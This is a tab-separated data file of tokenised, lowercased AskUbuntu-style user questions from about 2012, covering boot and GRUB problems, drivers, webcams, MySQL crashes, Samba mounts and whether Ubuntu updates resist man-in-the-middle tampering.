191101	how to roll back to original plymouth splash	the title says it all . it 's a bit of an eyesore with propriety nvidia drivers , so i tried here . i 'm pretty sure i reversed all settings , when it did not work for me . but now : sudo update-alternatives -- config default.plymouth returns error : update-alternatives : error : can not stat file '/lib/plymouth/themes/default.plymouth ' : too many levels of symbolic links i just wan na revert back to the vanilla 12.04 lts plymouth splash . thanks . also : sudo gedit /lib/plymouth/themes/default.plymouth returns : '' the number of followed links is limited and the actual file could not be found within this limit . '' edit : should i restore from image backup ( i see this filed as bug on launchpad . ) or is there a fix ?
191104	ca n't connect to my android 's hotspot	i 've tried to run ubuntu from live cd to check it . ubuntu recognized my android 's hotspot ( i use android 2.1 with `` wifi tethering '' ) but was n't able to connect to it . it 's really a problem for me because i do n't have any other internet connection . do you know why ?
191106	ubuntu 12.04 lts : error message `` failed to execute child process ''	i am an ubuntu-newbie and just started working with ubuntu ( version 12.04 lts ) a couple of days ago . i wanted to add a launcher icon to desktop for launching an application i previously installed . up to now i can only launch it by typing setsid matlab -desktop into my terminal . now there is the following problem with the execution via the desktop icon : whenever i click the desktop icon , i get the following error message : '' failed to execute child process '' i would like to add a screenshot , but unfortunately as a new user , i am not allowed to ... in the main menu from where i added the icon via drag'n'drop to desktop there is also a permission to execute the .desktop file . i also tried to look for advice on the error message `` failed to execute child process ... '' but could not find anything useful . now does anybody have an idea what i am missing ? sorry if this is a stupid question ; ) ... but as i just said : i just started with ubuntu ... thanks to everybody in advance for their help ! : ) and let me know if you should need any more information ... regards , ron
191107	unable to complete ubuntu installation	i am not a computer expert and have no programming experience . i have downloaded ubuntu 12.04 from the website using the windows installer onto an admittedly old toshiba satellite pro laptop . the download seemed to be fine . when i try to startup the laptop and select ubuntu i get a long series of messages starting : '' error : could n't read file [ 0.7392640 kernel panic - not syncing : vfs : unable to mount root fs on unknown-block ( 0,0 ) '' i have seen other entries on this messageboard with similar questions but to be honest , i ca n't follow the answers , which presume more knowledge than i have . i would be extremely grateful if anyone could suggest a solution .
191109	dun goofed the files in /usr/lib/x86_64-linux-gnu/	there was some weird package issue with ( in my limited understanding ) 32/64 bit libraries , so i went around making symlinks to the file my lamp installation expected to the ones that actually existed . i did this for a # of files in here : /usr/lib/x86_64-linux-gnu/ however php still ended up not working ( separate issue ) and now i believe i have a screwed up lib directory . is there a way to revert those library files ?
191112	how do i keep track of modifications to a new server ?	i purchased a server for the sole purpose of familiarizing myself with the cli so i do n't get royally screwed when i enter a real development environment . however , i have some questions . i 've managed to ssh into my server , all is fine and dandy , installed lamp too which went flawlessly . now i 'm wondering , the more changes i do , the more cluttered my server will become . can i revert changes ? i do n't want to keep customizing things and installing things and just having a cluttered server overall . where can i track changes to my system ?
191116	problems reinstalling windoxs xp instead ubuntu	i 've installed ubuntu in my netbook using all hard disk . it runs , but i do n't like it and i 'm trying to reinstall windows xp . i use an external cd-rom and the disk of installing windows xp . that starts running , but it is interrupted because `` it does n't find any disk installed in my system '' . it does n't recognize my hard disk ! someone knows what could i do ?
191125	is there an offline command-line dictionary ?	is there any command line offline dictionary ? i know that there are some like stardict and artha but how about one in the command line ? also , i tried dict but it is an online dictionary .
191126	remove ubuntu logo in upperleft hand corner of gnome classic	i really want to customize the bar at the top of ubuntu . my first `` problem '' is that i ca n't figure out how to change the logo in the upper left hand corner . any ideas ? edit : i 'm trying to change it to something else , just because i want it to not have any sign of ubuntu at first look at my desktop .
191127	cryptswap1 issue when booting 12.04	when i 'm starting my laptop which is running 12.04 , most times recently i get a message saying : its taking a while to mount dev/mapper/cryptswap1 if i want to wait or skip it . when i skip , nothing negative seems to happen , but just wanted to check to see if its something i should resolve .
191132	how to use 'screen ' to compile a project and give a notification when compilation is done ?	i am using `` screen '' on ubuntu . how can i use 'screen ' to compile my project and give me a notification when compile is done whether the build is successful or not ?
191135	how do i restore grub 2 ?	i upgraded my laptop with an ssd , moving my old hdd to where the dvd-drive was , so that i could have speed and storage . now , i have reinstalled ubuntu on the ssd , deleting all the partitions on the old hdd to make space for a data partition . but now the laptop does n't even get to grub 2 if the hdd is plugged in ! if i take it out , everything works , but as soon as i plug it in and retry to boot , i wo n't find grub . at first , i thought it was because of the boot order , but the order was ok : first the notebook hard drive ( ssd ) and then the cd/dvd drive ( which in reality is the hdd ) . how can i fix it ? doing a simple grub-install /dev/sda does n't work.. the ssd is sda , and the hdd is sdb .
191136	toshiba satellite l500 no wifi anymore !	i have a toshiba satellite l500 with ubuntu 12.04 and its wifi suddenly stopped working ! ! i 've never seen like that before.. i tried also using external usb wifis but no success . i am not able to turn it on with the function keys nor using rfkill commands and similar wlan manipulator commands in the terminal ! it was working before for at least 4-5 months ! ! the computer says it 's turned off by hardware . i checked it and the driver is fine . so why can i not use any wifi on my computer ? ? why it is suddenly disabled ? i checked the bios too there is enabled the wlan . i spent 10 hours for searching for solutions but i am out of ideas ! ! ! please help ! update : i have no wifi since i installed the following updates : bind9-host dnsutils libdns81 libisccc80 liblwres80 libbind9-80 libisccfg82 libisc83 freeglut3 ( i think this one can be ignored ) if i try to downgrade this updates in synaptic , it wants to delete some packages like : gnome-nettool , ubuntu-desktop etc . idea ?
191139	i am getting a message when i try to sign up	i am a new user . i just down loaded ubuntu 1 a few hours ago . i have been trying to sign up , but the sign up screen keeps saying that `` there was a problem getting the captcha , reloading ... '' and then it never reloads . can someone help me out to sign up ?
191142	is it possible to use the 'screen ' command to work with files on an encrypted home directory ?	so i have an encrypted home directory , set up during install on a server running ubuntu 12.04 lts . i attempted to use screen in order to run a script that accesses the data in my home directory after closing my ssh connection to this server , but ran into errors seemingly stemming from disk access . is this because leaving screen running does n't constitue staying logged in to the machine , and thus the files in my home directory will be unreachable by any program using screen due to it being unmounted and thus not decrypted ? ( and is it thus akin to running a cron job that uses encrypted files ? ) . if this hypothesis is true , what can i do to address this ?
191143	when i boot , i ca n't select ubuntu	boot problem ! it is stuck on windows as the default . arrow key will not let me select . tried arrow keypad as well as arrow keys on the numeric keypad . help !
191144	how can i run ubuntu off usb	i want to know if it is possible to install and run ubuntu completely off a flash drive without using my computers hard drive . i want to be able to plug in a usb and boot ubuntu off it . i ca n't get passed the install screen , and i 'm using version 11.10 . if this can be done , please help me .
191145	hp printer wont print because ink empty	my windows xp computer has no problem printing to an hp printer that thinks it has no black ink . however the xubuntu driver does not want to go any further . how can you tell it to go ahead anyway cause there is ink in this refilled cartridge .
191146	microsoft lifecam vx-2000 does n't work anymore in cheese	i got have two lifecam vx-2000 's and they do n't work in cheese anymore . i do n't know if it 's a problem with a missing package , or a package i installed . here is the output . ( cheese:11122 ) : clutter-warning ** : no listener with the specified listener id 29 ( cheese:11122 ) : clutter-warning ** : no listener with the specified listener id 30 ( cheese:11122 ) : clutter-warning ** : no listener with the specified listener id 31 ( cheese:11122 ) : clutter-warning ** : no listener with the specified listener id 32 ( cheese:11122 ) : glib-critical ** : g_hash_table_remove_internal : assertion `hash_table ! = null ' failed ( cheese:11122 ) : clutter-warning ** : not able to remove listener with id 1 ( cheese:11122 ) : glib-critical ** : g_hash_table_size : assertion `hash_table ! = null ' failed totem-video-thumbnailer : 'file : ///home/myusername/videos/webcam/2012-09-20- 191530.webm ' is n't thumbnailable reason : media contains no supported video streams . ** ( cheese:11122 ) : warning ** : could not generate thumbnail for /home/myusername/videos/webcam/2012-09-20-191530.webm ( video/webm ) notice the : reason : media contains no supported video streams . when i try to record a video it just makes a 13.2kb webm file with nothing . when i take a picture it works . edit : i 've been thinking that the problem started after installing the mediubuntu repository on my system .
191150	unity launcher does n't reappear automatically -- 12.04 in virtualbox	i have reopened the unity launcher by disabling auto-hide , thanks to this post -- http : //askubuntu.com/a/106673/42720 i am running 12.04 in virtualbox , and have tested this in both full-screen and windowed mode . moving the mouse to the left side , or top-left corner , of the ubuntu desktop does not make the unity launcher reappear . i 'd really like to be able to use this feature because i have a small laptop monitor . any ideas ? thanks
191151	my software center asks me to repair but says it cant repair due to an error	how to solve this error ? ! installarchives ( ) failed : dpkg : dependency problems prevent configuration of libmtp-dev : libmtp-dev depends on libmtp8 ( = 1.0.2-1ubuntu1 ) ; however : package libmtp8 is not installed . dpkg : error processing libmtp-dev ( -- configure ) : dependency problems - leaving unconfigured no apport report written because maxreports is reached already errors were encountered while processing : libmtp-dev error in function : dpkg : dependency problems prevent configuration of libmtp-dev : libmtp-dev depends on libmtp8 ( = 1.0.2-1ubuntu1 ) ; however : package libmtp8 is not installed . dpkg : error processing libmtp-dev ( -- configure ) : dependency problems - leaving unconfigured
191153	how can i downgrade a system that accidentally had backports installed ?	i installed a fresh ubuntu system . somehow - possibly through my own error - the backports repository got enabled . then i did several upgrades . i noticed that this happened when networking suddenly stopped working , `` network settings '' now has an `` ( alpha ) '' in the title bar , `` system settings '' â `` network '' now displays an error dialog saying `` the system network services are not compatible with this version '' . now , i 've disabled the backports repository , and i 'd like to restore my system to its previously-functional state . my question is twofold : how do i determine which packages were installed from backports ? can i automatically re-install all those packages ( and purge their configuration ) to get back to a sensible state ? if the answer to 2 is `` no '' i can probably manually purge some things and reinstall , but it would be nice to have it handled automatically . update : it was n't an update that broke the network ; it was apt-get install indicator-network , which installed something called `` connman '' and removed network-manager and network-manager-gnome . nevertheless i am leaving the question up , since i am still interested in how i can purge packages from a particular source after accidentally adding that source , and how i can determine which packages were installed from where .
191154	need more ram ? ? running vmmachine + ubuntu	so i looked but im running ubuntu in vm machine and its running at a snails pace and i installed the 64bit ver . running windows 7 64bit the down side is that i only have 2gb of ram installed ... ..bummer huh i know the answer is im going to need more ram i just want to confirm ... or is there an tip that i can do change some settings to make it run faster in vm ? i just want verification on what steps i can take if any to speed things up ? thanks experts !
191159	unity launcher hides too fast in autohide mode	i find that the unity launcher in the auto-hide option hides itself too fast . just as i click something , the launcher is gone . i do n't want to set it to `` never hide '' , i just want it to wait , say , 3-4 seconds after i click on an icon before disappearing . i have seen related questions , but they all talk about making it disappear faster .
191161	thunderbird keeps asking me for the password every time i login	i have n't used thunderbird for a while but when i started to use it again i found out that i have to give the application driven password since i 'm using gmail . so i type that application password which is automatically given by google , but it asks for that every time i try to login . it 's really frustrating as to obtain that password i have to go to google account settings every time i log into thunderbird . any help would be greatly appreciated .
191163	absolutely nothing apearing in `` additional drivers ''	i just got ubuntu the other month or so . i 'm running the 11.04 version currently and trying to install drivers for a nvidia graphics card ( it 's my brother 's computer and he currently can not find the number of the card right now ) . i read that , to install the proper drivers for gaming , i would need to go into `` additional drivers '' and choose them myself . i clicked to go into `` additional drivers '' and it searched `` for available drivers '' , then opened the additional drivers list . lo and behold , there was nothing , simply the message `` no proprietary drivers are in use on this system '' and the help and close buttons . sorry if there 's some silly simple answer to all of this , i 'm new to this sort of thing ( used to windows simplicity , lol ) and i really do n't know what to do . help would be much appreciated . also , i should mention that the graphics card was installed and ran fine before switching from windows xp to ubuntu .
191166	webcam does n't work in browser ... ?	i 'm running the latest version of ubuntu , and i have a dell sp2009wfd monitor with built in microphone and webcam . i 've gotten the microphone working on mumble and on sound recorder , and i 've gotten the webcam to work on cheese ... but it wo n't work through the flash player//website webcam things . i -have- the flash plugin , and i have drivers installed for my video card . could anyone help me figure this out ? it 's really frustrating . thank you ... !
191168	i have a red triangle appears at the top . why ?	i have ubuntu 12.04 lts , i have a red triangle appears at the top . why ? i download updates when they arrive . here is the result of the command typed : mahmoud @ mahmoud-hp-620 : ~ $ sudo apt-get update [ sudo ] password for mahmoud : ign http : //ma.archive.ubuntu.com precise inrelease ign http : //ma.archive.ubuntu.com precise-updates inrelease ign http : //ma.archive.ubuntu.com precise-backports inrelease hit http : //ma.archive.ubuntu.com precise release.gpg get:1 http : //ma.archive.ubuntu.com precise-updates release.gpg [ 198 b ] ign http : //extras.ubuntu.com precise inrelease ign http : //security.ubuntu.com precise-security inrelease ign http : //ppa.launchpad.net precise inrelease get:2 http : //ma.archive.ubuntu.com precise-backports release.gpg [ 198 b ] hit http : //extras.ubuntu.com precise release.gpg get:3 http : //security.ubuntu.com precise-security release.gpg [ 198 b ] ign http : //ppa.launchpad.net precise release.gpg hit http : //extras.ubuntu.com precise release hit http : //ma.archive.ubuntu.com precise release get:4 http : //security.ubuntu.com precise-security release [ 49,6 kb ] ign http : //ppa.launchpad.net precise release get:5 http : //ma.archive.ubuntu.com precise-updates release [ 49,6 kb ] hit http : //extras.ubuntu.com precise/main sources hit http : //extras.ubuntu.com precise/main i386 packages ign http : //extras.ubuntu.com precise/main translationindex ign http : //ppa.launchpad.net precise/main translationindex get:6 http : //security.ubuntu.com precise-security/main sources [ 44,4 kb ] get:7 http : //ma.archive.ubuntu.com precise-backports release [ 49,6 kb ] get:8 http : //security.ubuntu.com precise-security/restricted sources [ 1 950 b ] get:9 http : //security.ubuntu.com precise-security/universe sources [ 13,5 kb ] get:10 http : //security.ubuntu.com precise-security/multiverse sources [ 1 386 b ] get:11 http : //security.ubuntu.com precise-security/main i386 packages [ 167 kb ] hit http : //ma.archive.ubuntu.com precise/main sources hit http : //ma.archive.ubuntu.com precise/restricted sources hit http : //ma.archive.ubuntu.com precise/universe sources hit http : //ma.archive.ubuntu.com precise/multiverse sources hit http : //ma.archive.ubuntu.com precise/main i386 packages hit http : //ma.archive.ubuntu.com precise/restricted i386 packages hit http : //ma.archive.ubuntu.com precise/universe i386 packages hit http : //ma.archive.ubuntu.com precise/multiverse i386 packages hit http : //ma.archive.ubuntu.com precise/main translationindex hit http : //ma.archive.ubuntu.com precise/multiverse translationindex hit http : //ma.archive.ubuntu.com precise/restricted translationindex hit http : //ma.archive.ubuntu.com precise/universe translationindex get:12 http : //ma.archive.ubuntu.com precise-updates/main sources [ 168 kb ] get:13 http : //ma.archive.ubuntu.com precise-updates/restricted sources [ 3 285 b ] get:14 http : //security.ubuntu.com precise-security/restricted i386 packages [ 3 968 b ] get:15 http : //security.ubuntu.com precise-security/universe i386 packages [ 44,3 kb ] get:16 http : //ma.archive.ubuntu.com precise-updates/universe sources [ 52,6 kb ] err http : //ppa.launchpad.net precise/main sources 404 not found err http : //ppa.launchpad.net precise/main i386 packages 404 not found get:17 http : //ma.archive.ubuntu.com precise-updates/multiverse sources [ 4 241 b ] get:18 http : //ma.archive.ubuntu.com precise-updates/main i386 packages [ 392 kb ] get:19 http : //security.ubuntu.com precise-security/multiverse i386 packages [ 2 369 b ] hit http : //security.ubuntu.com precise-security/main translationindex hit http : //security.ubuntu.com precise-security/multiverse translationindex hit http : //security.ubuntu.com precise-security/restricted translationindex hit http : //security.ubuntu.com precise-security/universe translationindex ign http : //extras.ubuntu.com precise/main translation-en_us ign http : //extras.ubuntu.com precise/main translation-en ign http : //extras.ubuntu.com precise/main translation-fr ign http : //ppa.launchpad.net precise/main translation-en_us hit http : //security.ubuntu.com precise-security/main translation-en hit http : //security.ubuntu.com precise-security/multiverse translation-en hit http : //security.ubuntu.com precise-security/restricted translation-en ign http : //ppa.launchpad.net precise/main translation-en hit http : //security.ubuntu.com precise-security/universe translation-en ign http : //ppa.launchpad.net precise/main translation-fr get:20 http : //ma.archive.ubuntu.com precise-updates/restricted i386 packages [ 6 732 b ] get:21 http : //ma.archive.ubuntu.com precise-updates/universe i386 packages [ 132 kb ] get:22 http : //ma.archive.ubuntu.com precise-updates/multiverse i386 packages [ 9 673 b ] hit http : //ma.archive.ubuntu.com precise-updates/main translationindex hit http : //ma.archive.ubuntu.com precise-updates/multiverse translationindex hit http : //ma.archive.ubuntu.com precise-updates/restricted translationindex hit http : //ma.archive.ubuntu.com precise-updates/universe translationindex get:23 http : //ma.archive.ubuntu.com precise-backports/main sources [ 2 422 b ] get:24 http : //ma.archive.ubuntu.com precise-backports/restricted sources [ 14 b ] get:25 http : //ma.archive.ubuntu.com precise-backports/universe sources [ 14,5 kb ] get:26 http : //ma.archive.ubuntu.com precise-backports/multiverse sources [ 2 669 b ] get:27 http : //ma.archive.ubuntu.com precise-backports/main i386 packages [ 1 941 b ] get:28 http : //ma.archive.ubuntu.com precise-backports/restricted i386 packages [ 14 b ] get:29 http : //ma.archive.ubuntu.com precise-backports/universe i386 packages [ 12,9 kb ] get:30 http : //ma.archive.ubuntu.com precise-backports/multiverse i386 packages [ 2 504 b ] hit http : //ma.archive.ubuntu.com precise-backports/main translationindex hit http : //ma.archive.ubuntu.com precise-backports/multiverse translationindex hit http : //ma.archive.ubuntu.com precise-backports/restricted translationindex hit http : //ma.archive.ubuntu.com precise-backports/universe translationindex hit http : //ma.archive.ubuntu.com precise/main translation-en hit http : //ma.archive.ubuntu.com precise/main translation-fr hit http : //ma.archive.ubuntu.com precise/multiverse translation-en hit http : //ma.archive.ubuntu.com precise/multiverse translation-fr hit http : //ma.archive.ubuntu.com precise/restricted translation-en hit http : //ma.archive.ubuntu.com precise/restricted translation-fr hit http : //ma.archive.ubuntu.com precise/universe translation-en hit http : //ma.archive.ubuntu.com precise/universe translation-fr hit http : //ma.archive.ubuntu.com precise-updates/main translation-en hit http : //ma.archive.ubuntu.com precise-updates/main translation-fr hit http : //ma.archive.ubuntu.com precise-updates/multiverse translation-en hit http : //ma.archive.ubuntu.com precise-updates/multiverse translation-fr hit http : //ma.archive.ubuntu.com precise-updates/restricted translation-en hit http : //ma.archive.ubuntu.com precise-updates/restricted translation-fr hit http : //ma.archive.ubuntu.com precise-updates/universe translation-en hit http : //ma.archive.ubuntu.com precise-updates/universe translation-fr hit http : //ma.archive.ubuntu.com precise-backports/main translation-en hit http : //ma.archive.ubuntu.com precise-backports/multiverse translation-en hit http : //ma.archive.ubuntu.com precise-backports/restricted translation-en hit http : //ma.archive.ubuntu.com precise-backports/universe translation-en fetched 1 233 kb in 2s ( 501 kb/s ) w : failed to fetch http : //ppa.launchpad.net/claudiocn/slm/ubuntu/dists/precise/main/source/sources 404 not found w : failed to fetch http : //ppa.launchpad.net/claudiocn/slm/ubuntu/dists/precise/main/binary-i386/packages 404 not found e : some index files failed to download . they have been ignored , or old ones used instead . mahmoud @ mahmoud-hp-620 : ~ $
191173	ubuntu12.04 is not booting after connecting dvd player . please help	i am using ubuntu 12.04 . yesterday i connected a dvd player to my system , now i 've got a problem with booting . i get message like : busy box 2.xx ... ... ... ... ... dev/disk/uidb < some numbers > does not exist initrams please help me . thanks in advance .
191179	why ca n't i mount my wd my passport usb drive ?	i got a wd my passport 1tb external hd , ubuntu recognize it as a cd but cant mount it . i 'm usin a pc amd athlon ( tm ) 64 x2 dual core processor 4200+ ă 2 , edubuntu presice 12.04 64-bit , 500gb hdd , 8gb ram , graphics : gallium 0.4 on nv4c
191181	logitech c270 webcam reading from wrong position	have got my logitech c270 webcam working out of the box for cheese , skype and it 's working fine , sound as well . but when i go to a website stream it is looking for my camera here ; file/dev/video0 the trouble is everything else is say my webcam is here instead ; file/dev/video1 so it works ok on skype with those settings but other sites are looking for cam in the wrong place ? thanks now for any advice : )
191182	garena plus on ubuntu 12.04	does the current version of garena plus run in ubuntu 12.04 without problems ? i 've tried wine , but it does n't work , and i ca n't find any news about it on winehq . i followed the instructions on their forums , but it still did n't work . is there any application that can run windows programs on ubuntu 12.04 except wine ?
191186	mounting samba shares at boot/login and using script	i have a server running on desktop , since my aunt that lives with me is taking classes for ms office it is currently booting xp , so i have setup sharing of all my drives so i can access my files but how can i auto mount those drives at boot and also with help of script ? i need the script cause i 'm often messing around on laptop and tend to loose connectivity so the scripts need to unmount and den remount , sort of like a referesh . i have no user id or pass setup on windows and the drives ntfs permission is set to allow everyone . how do i achieve what i need ? ps : i managed to create a script but it asks for password every time it mounts a share ! ! !
191190	i continue to get this when trying to log into ubuntu one from the ubuntu desktop	**enter password to unlock your login keyring** the password that you use to log into your computer is no longer matches your log in keyring .
191192	error : dependency is not satisfiable : libasound2 ( > = 1.0.23 ) wine	i am trying to install wine 1.4 on my ubuntu 10.04 . i downloaded the deb file from ubuntu packages i opened the file and i get this error dependency is not satisfiable : libasound2 ( > = 1.0.23 ) how can i fix this ?
191193	libstdc++.so.6 : version glibcxx_3.4.15 not found required by compiz	i got this error : /opt/quartus/linux/libstdc++.so.6 : version glibcxx_3.4.15 not found required by compiz i am also unable to work with apt-get .
191200	why i ca n't install new fonts in libreoffice ?	i have installed a lot of fonts before , but this time things are really different . i have downloaded some true type font ( ttf ) fonts . then paste them in the directory usr/share/fonts after that i 've restarted libreoffice writer but do n't find them in the font list . no better result with pc rebooting . then again paste them in the directory usr/share/fonts/truetype and again restarted libreoffice writer , but still they are n't on the font list . i 've tried in another way . opened the fonts with font viewer and click on the `` install '' but the result is same . no improvement at all . latest i 've just found that those specific fonts are installed on my system , they present on gedit font list , but not in the libreoffice font list . so , may be the problem is with libreoffice . very surprising and irritating issue indeed .
191201	can not access windows files from ubuntu	i just installed ubuntu on my netbook thinking i could decide whether to start ubuntu or windows xp at will . now if i try to start windows , it says system32 is missing and i do n't know how to access my files from ubuntu . how do i find my files ? can i import bookmarks from the firefox run through windows xp ? does this thing have msn ?
191203	12.04 sound keeps auto-muting when idle	i just installed 12.04 on an hp8510w . everything works fine except for one weird behavior which i have noticed . when ever there is no audio playing , the audio mute indicator on the laptop is on . as soon as i start playing a you tube video the mute indicator turns off and i get sound . here is my pulse audio output which says that the sink is suspended because it is idle : welcome to pulseaudio ! use `` help '' for usage information . list-sinks 1 sink ( s ) available . index : 0 name : < alsa_output.pci-0000_00_1b.0.analog-stereo > driver : < module-alsa-card.c > flags : hardware hw_mute_ctrl hw_volume_ctrl decibel_volume latency dynamic_latency state : suspended suspend cause : idle i tried running alsamixer , but i do n't see the auto-mute option .
191208	how to use geoip with nginx on ubuntu 12.04 ?	i want a tutorial to help me in using geoip with nginx on ubuntu 12.04 .
191210	how to print file directly , circumventing the print dialog ?	how to print in single command/shortcut ( like ctrl+p ) without showing the print configuration window ?
191212	mysql 5.5 - lost connection to mysql server during query	i have an ubuntu 12.04 lts server running at a german hoster ( virtualized system ) . # uname -a linux ... 3.2.0-27-generic # 43-ubuntu smp fri jul 6 14:25:57 utc 2012 x86_64 x86_64 x86_64 gnu/linux i want to migrate a web cms system , called contao . it 's not my first migration , but my first migration having connection issues with mysql . migration went successfully , i have the same contao version running ( it 's more or less just copy / paste ) . for the database behind , i did : apt-get install mysql-server phpmyadmin i set a root password and added a user for the cms which has enough rights on its own database ( and only its database ) for doing the stuff it has to do . data import via phpmyadmin worked just fine . i can access the backend of the cms ( which needs to deal with the database already ) . if i try to access the frontend now , i get the following error : fatal error : uncaught exception exception with message query error : lost connection to mysql server during query ( < query statement here , nothing special , just a select > ) thrown in /var/www/system/libraries/database.php on line 686 ( keep in mind : i can access mysql with phpmyadmin and through the backend , working like a charme , it 's just the frontend call causing errors ) . if i spam f5 in my browser i can sometimes even kill the mysql deamon . if i run # mysqld -- log-warnings=2 i get this : ... 120921 7:57:31 [ note ] mysqld : ready for connections . version : '5.5.24-0ubuntu0.12.04.1 ' socket : '/var/run/mysqld/mysqld.sock ' port : 3306 ( ubuntu ) 05:57:37 utc - mysqld got signal 4 ; this could be because you hit a bug . it is also possible that this binary or one of the libraries it was linked against is corrupt , improperly built , or misconfigured . this error can also be caused by malfunctioning hardware . we will try our best to scrape up some info that will hopefully help diagnose the problem , but since we have already crashed , something is definitely wrong and this may fail . key_buffer_size=16777216 read_buffer_size=131072 max_used_connections=1 max_threads=151 thread_count=1 connection_count=1 it is possible that mysqld could use up to key_buffer_size + ( read_buffer_size + sort_buffer_size ) *max_threads = 346679 k bytes of memory hope that 's ok ; if not , decrease some variables in the equation . thread pointer : 0x7f1485db3b20 attempting backtrace . you can use the following information to find out where mysqld died . if you see no messages after this , something went terribly wrong ... stack_bottom = 7f1480041e60 thread_stack 0x30000 mysqld ( my_print_stacktrace+0x29 ) [ 0x7f1483b96459 ] mysqld ( handle_fatal_signal+0x483 ) [ 0x7f1483a5c1d3 ] /lib/x86_64-linux-gnu/libpthread.so.0 ( +0xfcb0 ) [ 0x7f1482797cb0 ] /lib/x86_64-linux-gnu/libm.so.6 ( +0x42e11 ) [ 0x7f14821cae11 ] mysqld ( _zn10sql_select17test_quick_selectep3thd6bitmapilj64eeyyb+0x1368 ) [ 0x7f1483b26cb8 ] mysqld ( +0x33116a ) [ 0x7f148397916a ] mysqld ( _zn4join8optimizeev+0x558 ) [ 0x7f148397d3e8 ] mysqld ( _z12mysql_selectp3thdppp4itemp10table_listjr4listis1_es2_jp8st_ordersb_s2_sb_yp13select_resultp18st_select_lex_unitp13st_select_lex+0xdd ) [ 0x7f148397fd7d ] mysqld ( _z13handle_selectp3thdp3lexp13select_resultm+0x17c ) [ 0x7f1483985d2c ] mysqld ( +0x2f4524 ) [ 0x7f148393c524 ] mysqld ( _z21mysql_execute_commandp3thd+0x293e ) [ 0x7f14839451de ] mysqld ( _z11mysql_parsep3thdpcjp12parser_state+0x10f ) [ 0x7f1483948bef ] mysqld ( _z16dispatch_command19enum_server_commandp3thdpcj+0x1365 ) [ 0x7f148394a025 ] mysqld ( _z24do_handle_one_connectionp3thd+0x1bd ) [ 0x7f14839ec7cd ] mysqld ( handle_one_connection+0x50 ) [ 0x7f14839ec830 ] /lib/x86_64-linux-gnu/libpthread.so.0 ( +0x7e9a ) [ 0x7f148278fe9a ] /lib/x86_64-linux-gnu/libc.so.6 ( clone+0x6d ) [ 0x7f1481eba4bd ] trying to get some variables . some pointers may be invalid and cause the dump to abort . query ( 7f1464004b60 ) : is an invalid pointer connection id ( thread id ) : 1 status : not_killed from /var/log/syslog : sep 21 07:17:01 s16477249 cron [ 23855 ] : ( root ) cmd ( cd / & & run-parts -- report /etc/cron.hourly ) sep 21 07:18:51 s16477249 kernel : [ 231923.349159 ] type=1400 audit ( 1348204731.333:70 ) : apparmor= '' status '' operation= '' profile_replace '' name= '' /usr/sbin/mysqld '' pid=23946 comm= '' apparmor_parser '' sep 21 07:18:53 s16477249 /etc/mysql/debian-start [ 23990 ] : upgrading mysql tables if necessary . sep 21 07:18:53 s16477249 /etc/mysql/debian-start [ 23993 ] : /usr/bin/mysql_upgrade : the ' -- basedir ' option is always ignored sep 21 07:18:53 s16477249 /etc/mysql/debian-start [ 23993 ] : looking for 'mysql ' as : /usr/bin/mysql sep 21 07:18:53 s16477249 /etc/mysql/debian-start [ 23993 ] : looking for 'mysqlcheck ' as : /usr/bin/mysqlcheck sep 21 07:18:53 s16477249 /etc/mysql/debian-start [ 23993 ] : this installation of mysql is already upgraded to 5.5.24 , use -- force if you still need to run mysql_upgrade sep 21 07:18:53 s16477249 /etc/mysql/debian-start [ 24004 ] : checking for insecure root accounts . sep 21 07:18:53 s16477249 /etc/mysql/debian-start [ 24009 ] : triggering myisam-recover for all myisam tables i 'm using myisam tables all over , nothing with innodb there . starting / stopping mysql is done via sudo service mysql start sudo service mysql stop after using google a little bit , i experimented a little bit with timeouts , correct socket path in the /etc/mysql/my.cnf file , but nothing helped . there are some old ( from 2008 ) gentoo bugs , where re-compiling just solved the problem . i already re-installed mysql via : sudo apt-get remove mysql-server mysql-common sudo apt-get autoremove sudo apt-get install mysql-server without any results . this is the first time i 'm running into this problem , and i 'm not very experienced with this kind of mysql 'administration ' . so mainly , i want to know if anyone of you could help me out please : ) is it a mysql bug ? is something broken in the ubuntu repositories ? is this one of those misterious 'use-tcp-connection-instead-of-socket-stuff-because-there-are-problems-on-virtualized-machines-with-sockets'-problem ? or am i completly on the wrong way and i just miss-configured something ? remember , phpmyadmin and access to the backend ( which uses the database , too ) is just fine . maybe something with apache ? what can i do ? any help is appreciated , so thanks in advance : ) edit : i tried using tcp protocol instead of a local socket , like described here . unfortunately , it changed nothing . any idea anyone of you ?
191215	copying files from hard disk to liveusb	i am very new to ubuntu . i am using the latest desktop version of ubuntu 12.04 . i have created a live usb and booted in to my desktop.i want to copy files from my desktop hard disk to the live usb so that i can copy them back to my laptop hard disk . is it possible ?
191218	ubuntu graphics experience is fallback	the graphics experience is in fallback mode for me . and i checked the settings and it says the graphics driver is chromium . i am running ubuntu 11.10 in a virtual box . i did n't like unity much . so reverted from it long back . and it was working fine till now . how do i fix the issue . no desktop effects is working now ! note : host os windows 7 graphics ati radeon hd series virtual box version 4.1.6 another guest os ubuntu is working fine..
191221	openvpn and login authentication for os x	i am gathering that this sounds insane and impossible to do , but i thought i 'd ask anyways . i 'd like to setup roaming profiles for my self and a couple of other users , but we do n't have the resources to purchase a server . i have a vps that i use for testing , and prototyping , etc . that 's ubuntu 12 . i installed openldap on it , and i can authenticate mac os x login against it . although the login works , the home folder is n't working making the whole thing unusable . so i though samba would be the answer , but samba over the internet is insane as i have been told . so is it possible to setup a vpn and authenticate the mac os x user login against the vpn 's ldap directory ? i 'm pretty sure this is not doable , since the vpn client is used after login has been made . by the way , i am a python programmer by day , so sys admin tasks are over my head . but i love to learn sys admin tasks , and when i get it to work , it 's better than getting a web app to work
191223	where is the documentation for the .desktop unity launcher file format ?	i recently asked this question as i could not google the documentation for how .desktop files should look like . does such documentation exist ? where is it ?
191224	how is ubuntu update secured against man in the middle attack ?	originally i want ( ed ) to know how ubuntu update process is being secured against tampering ofpackages by a man in the middle . this has been this question here : are virus/rootkits via ubuntu updates possible ? [ closed ] it has been closed for being assumed to be a duplicate . still the assumed duplicates cover some quite different topics ( like how cd/flashdrive autorun etc effects safety etc. ) . so i post the question again . i seek an answer to how the updated process is secured against a man in the middle attack . pardon me for the potential annoyance , but the topic deeply interested me since there are quite many updates in ubuntu ( at least one security update each week ) and knowing what way this updates can be a path for malware is important to me . maybe somebody will be a nice fellow and able to bring some light to this question . i would also dearly appreciate that with some less ignorance the question will remain opened this time , for indeed it is not totally the covered by the questions : how is the system kept secure ? ( covers more the aspect of gaining root access ) and still not well enough in what security policies exist in place for packages and scripts ? ( covers the aspect of deb safety files being autorun ) neither of the `` duplicates '' covers the aspect how the update process is secured .
